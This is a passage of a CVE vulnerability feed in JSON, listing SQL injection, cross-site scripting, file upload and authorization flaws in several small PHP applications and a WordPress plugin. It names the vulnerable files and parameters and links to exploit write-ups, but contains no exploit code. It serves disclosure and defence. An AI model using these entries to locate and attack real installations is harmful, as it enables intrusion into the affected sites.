"https://www.wordfence.com/threat-intel/vulnerabilities/id/486ffdc9-a3e7-4f4c-89b1-b668a5d41aa5?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/wp-radio/", "name" : "https://wordpress.org/plugins/wp-radio/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/486ffdc9-a3e7-4f4c-89b1-b668a5d41aa5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/486ffdc9-a3e7-4f4c-89b1-b668a5d41aa5?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Radio – Worldwide Online Radio Stations Directory for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's settings in all versions up to, and including, 3.1.9 due to insufficient input sanitization and output escaping as well as insufficient access control on the settings. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpmilitary:wp_radio:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.1.9", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-04-10T05:15Z", "lastModifiedDate" : "2025-02-05T17:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10410", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/K1nako0/tmp_vuln9/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln9/blob/main/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281953", "name" : "VDB-281953 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281953", "name" : "VDB-281953 | SourceCodester Online Hotel Reservation System controller.php upload unrestricted upload", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431502", "name" : "Submit #431502 | SourceCodester Online Hotel Reservation System 1.0 controller.php Unrestricted Upload", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in SourceCodester Online Hotel Reservation System 1.0. Affected by this vulnerability is the function upload of the file /admin/mod_room/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:janobe:online_hotel_reservation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T04:15Z", "lastModifiedDate" : "2024-10-29T20:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10411", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/K1nako0/tmp_vuln10/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln10/blob/main/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.281940", "name" : "VDB-281940 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281940", "name" : "VDB-281940 | SourceCodester Online Hotel Reservation System controller.php doCheckout sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431586", "name" : "Submit #431586 | SourceCodester Online Hotel Reservation System 1.0 mod_reservation\\controller.php SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Online Hotel Reservation System 1.0. It has been classified as critical. Affected is the function doCancelRoom/doCancel/doConfirm/doCancel/doCheckin/doCheckout of the file /marimar/admin/mod_room/controller.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:janobe:online_hotel_reservation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T05:15Z", "lastModifiedDate" : "2024-10-29T20:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10412", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281941", "name" : "VDB-281941 | Poco-z Guns-Medical File Upload upload cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281941", "name" : "VDB-281941 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427005", "name" : "Submit #427005 | Guns-Medical 1.0 Arbitrary File Upload", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/Poco-z/Guns-Medical/issues/15", "name" : "https://github.com/Poco-z/Guns-Medical/issues/15", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Poco-z Guns-Medical 1.0. It has been declared as problematic. Affected by this vulnerability is the function upload of the file /mgr/upload of the component File Upload. The manipulation of the argument picture leads to cross site scripting. The attack can be launched remotely." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:poco-z:guns-medial:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-27T08:15Z", "lastModifiedDate" : "2024-10-29T20:40Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10413", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281954", "name" : "VDB-281954 | SourceCodester Online Hotel Reservation System update.php upload unrestricted upload", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281954", "name" : "VDB-281954 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431595", "name" : "Submit #431595 | SourceCodester Online Hotel Reservation System 1.0 guest\\update.php Unrestricted Upload", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/K1nako0/tmp_vuln11/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln11/blob/main/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in SourceCodester Online Hotel Reservation System 1.0. Affected by this issue is the function upload of the file /guest/update.php. The manipulation of the argument image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:janobe:online_hotel_reservation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T10:15Z", "lastModifiedDate" : "2024-10-29T20:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10414", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_vehicle_record_system_edit_brand_xss.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_vehicle_record_system_edit_brand_xss.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.281955", "name" : "VDB-281955 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281955", "name" : "VDB-281955 | PHPGurukul Vehicle Record System edit-brand.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431623", "name" : "Submit #431623 | PHPGurukul Vehicle Record System 1.0 Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in PHPGurukul Vehicle Record System 1.0. This affects an unknown part of the file /admin/edit-brand.php. The manipulation of the argument Brand Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions the parameter \"phone_number\" to be affected. But this might be a mistake because the textbox field label is \"Brand Name\"." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:vehicle_record_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-27T11:15Z", "lastModifiedDate" : "2024-10-29T20:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10415", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/2aba05ef2277d85ea4148dc42189eae0", "name" : "https://gist.github.com/higordiego/2aba05ef2277d85ea4148dc42189eae0", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281956", "name" : "VDB-281956 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281956", "name" : "VDB-281956 | code-projects Blood Bank Management System accept.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431685", "name" : "Submit #431685 | code-projects Blood Bank Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in code-projects Blood Bank Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /file/accept.php. The manipulation of the argument reqid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T12:15Z", "lastModifiedDate" : "2024-10-29T20:26Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10416", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/18cf04067697c8ceb2cba68980139dcc", "name" : "https://gist.github.com/higordiego/18cf04067697c8ceb2cba68980139dcc", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281957", "name" : "VDB-281957 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281957", "name" : "VDB-281957 | code-projects Blood Bank Management System cancel.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431686", "name" : "Submit #431686 | code-projects Blood Bank Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Blood Bank Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /file/cancel.php. The manipulation of the argument reqid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T13:15Z", "lastModifiedDate" : "2024-10-29T20:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10417", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/bf0cf963ec56cfe0dcaba2956352bafd", "name" : "https://gist.github.com/higordiego/bf0cf963ec56cfe0dcaba2956352bafd", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281958", "name" : "VDB-281958 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281958", "name" : "VDB-281958 | code-projects Blood Bank Management System delete.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431781", "name" : "Submit #431781 | code-projects Blood Bank Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /file/delete.php. The manipulation of the argument bid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T13:15Z", "lastModifiedDate" : "2024-10-29T20:19Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10418", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/25a103a1fe84c4db4530e68d2f998d11", "name" : "https://gist.github.com/higordiego/25a103a1fe84c4db4530e68d2f998d11", "refsource" : "", "tags" : [ "Exploit", "Mitigation", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281959", "name" : "VDB-281959 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281959", "name" : "VDB-281959 | code-projects Blood Bank Management System infoAdd.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431782", "name" : "Submit #431782 | code-projects Blood Bank Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /file/infoAdd.php. The manipulation of the argument bg leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T14:15Z", "lastModifiedDate" : "2024-10-29T00:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10419", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/62ad5208270c67834d02818d6ba44126", "name" : "https://gist.github.com/higordiego/62ad5208270c67834d02818d6ba44126", "refsource" : "", "tags" : [ "Exploit", "Mitigation", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281960", "name" : "VDB-281960 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281960", "name" : "VDB-281960 | code-projects Blood Bank Management System bloodrequest.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431784", "name" : "Submit #431784 | code-projects Blood Bank Management System 1.0 Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /bloodrequest.php. The manipulation of the argument msg leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-27T15:15Z", "lastModifiedDate" : "2024-10-29T00:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1042", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/wp-radio/", "name" : "https://wordpress.org/plugins/wp-radio/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b46e9771-37ff-4825-9af9-02ecde424653?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b46e9771-37ff-4825-9af9-02ecde424653?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/wp-radio/", "name" : "https://wordpress.org/plugins/wp-radio/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b46e9771-37ff-4825-9af9-02ecde424653?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b46e9771-37ff-4825-9af9-02ecde424653?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Radio – Worldwide Online Radio Stations Directory for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple AJAX functions in all versions up to, and including, 3.1.9. This makes it possible for authenticated attackers, with subscriber access and above, to import radio stations, remove countries, and modify the plugin's settings, which can lead to Cross-Site Scripting, tracked separately in CVE-2024-1041." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpmilitary:wp_radio:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.1.9", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.5 } }, "publishedDate" : "2024-04-10T05:15Z", "lastModifiedDate" : "2025-01-28T21:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10420", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281961", "name" : "VDB-281961 | SourceCodester Attendance and Payroll System update.php upload unrestricted upload", "refsource" : "", "tags" : [ "Third 